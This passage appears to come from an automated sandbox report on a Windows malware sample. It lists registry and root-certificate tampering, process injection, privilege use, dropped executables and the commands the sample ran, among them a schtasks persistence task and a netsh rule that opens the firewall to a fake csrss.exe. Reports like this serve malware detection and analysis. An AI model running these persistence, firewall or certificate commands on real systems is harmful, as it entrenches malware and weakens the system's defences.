Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cbujigs N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1456 wrote to memory of 2612 N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\BE11.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\BE11.dll

C:\Users\Admin\AppData\Local\Temp\BFC7.exe

C:\Users\Admin\AppData\Local\Temp\BFC7.exe

C:\Users\Admin\AppData\Local\Temp\D339.exe

C:\Users\Admin\AppData\Local\Temp\D339.exe

C:\Users\Admin\AppData\Local\Temp\E2E3.exe

C:\Users\Admin\AppData\Local\Temp\E2E3.exe

C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp" /SL5="$5016C,3536428,54272,C:\Users\Admin\AppData\Local\Temp\E2E3.exe"

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -i

C:\Users\Admin\AppData\Local\Temp\F250.exe

C:\Users\Admin\AppData\Local\Temp\F250.exe

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -s

C:\Windows\system32\taskeng.exe

taskeng.exe {82D36A8A-7AB0-4EA8-BA0E-1F21D46A3595} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\cbujigs

C:\Users\Admin\AppData\Roaming\cbujigs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 128

C:\Users\Admin\AppData\Local\Temp\911F.exe

C:\Users\Admin\AppData\Local\Temp\911F.exe

C:\Users\Admin\AppData\Local\Temp\A220.exe

C:\Users\Admin\AppData\Local\Temp\A220.exe

C:\Users\Admin\AppData\Local\Temp\B276.exe

C:\Users\Admin\AppData\Local\Temp\B276.exe

C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp" /SL5="$201D2,4081152,54272,C:\Users\Admin\AppData\Local\Temp\B276.exe"

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp

C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240222062035.log C:\Windows\Logs\CBS\CbsPersist_20240222062035.cab

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

